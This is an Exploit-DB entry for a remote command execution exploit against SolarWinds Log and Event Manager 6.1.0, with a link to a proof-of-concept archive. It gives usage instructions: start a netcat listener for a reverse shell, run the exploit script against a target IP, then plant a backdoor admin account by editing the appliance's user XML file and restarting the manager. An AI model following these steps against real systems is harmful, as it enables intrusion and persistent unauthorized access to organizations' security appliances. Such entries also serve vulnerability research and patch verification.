SolarWinds Log and Event Manager/Trigeo SIM 6.1.0 - Remote Command Execution

EDB-ID:

38644

CVE:

N/A




Platform:

Windows

Date:

2015-11-06


Requirements:

Python 2.7
netcat

Tested on: 
Ubuntu 14.04 LTS

Vulnerable Appliance Version: 6.1.0
Download: http://downloads.solarwinds.com/solarwinds/Release/LEM/SolarWinds-LEM-v6.1.0-Evaluation-VMware.exe

Instructions:

The exploit_lem.py script will need to be run sudo since it uses sockets
which bind to port 21 and 80. These could be changed, but the rest of 
the script would need to be modified as well. 

Prior to running the python script, set up a netcat listener for the
reverse shell: netcat -l 4444

Example: sudo python exploit_lem.py -t 192.168.1.100 -b 192.168.1.101 -l 192.168.1.101 -lp 4444

After access has been gained to the appliance, a new admin user can be added to the web console
by editing /usr/local/contego/run/manager/UserContextLibrary.xml. Simply copy the xml structure 
for the admin user that is already in there and then change the fields to create a new user. In
order to get a valid password hash, use the gen_pass_hash.py script included with this package. 
Please note that a manager restart will be needed before you can login with the new user. This 
can be accomplished by running "/etc/init.d/contego-manager restart"

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38644.zip